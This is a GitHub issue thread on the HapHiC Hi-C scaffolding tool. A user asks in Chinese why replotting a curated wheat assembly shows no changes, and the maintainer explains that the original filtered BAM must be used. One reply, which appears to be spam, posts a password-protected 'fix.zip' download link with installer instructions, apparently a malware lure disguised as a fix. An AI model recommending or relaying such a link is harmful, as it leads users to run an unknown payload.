### ISSUE TITLE
haphic plot 

### ISSUE THREAD

**Issue by ShumderLee** [zengxiaofei/HapHiC#56]
曾老师，您好！
我最近在组装一个小麦品种基因组，草图是用hifiasm软件组装得到的，下游HiC挂载用的是p_ctg.g组装版本。Hic数据比对用的是您推荐的bwa mem流程，挂载用的是One-line command，可以得到较好的挂载结果，21条染色体。用juicerbox对一些易位和倒位拼装错误进行了手动矫正，但重新画图后发现很多修改没有变化，重新画图代码：~/software/HapHiC/haphic plot ./04.build/Juicebox_curation/out_JBAT.FINAL.agp ./contact_matrix.pkl，其中contact_matrix.pkl是hic数据比对草图的bam，这里是不是应该用hic数据比对out_JBAT.FINAL.fa后的bam文件？
另外，您在最新版本的中解决了scale factor和.review.assembly解析问题，请问用新版本中juicebox.sh对上一版本得到的挂载结果进行处理是否可以得到没问题的.hic和.assembly文件？还是需要用新版本重新进行hic挂载分析？

李顺达

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zengxiaofei** [comment]
> 但重新画图后发现很多修改没有变化，重新画图代码：~/software/HapHiC/haphic plot ./04.build/Juicebox_curation/out_JBAT.FINAL.agp ./contact_matrix.pkl，其中contact_matrix.pkl是hic数据比对草图的bam，这里是不是应该用hic数据比对out_JBAT.FINAL.fa后的bam文件？

Because the AGP file has changed, the original .pkl file cannot be used for visualization any longer. So, you need to use the original HiC.filtered.bam to draw heatmaps. We emphasized this in the documentation:

> **Note:** The input AGP file and the parameters --bin_size and --min_len must remain consistent throughout.

**Comment by zengxiaofei** [comment]
Close this issue as there has been no response for two weeks.
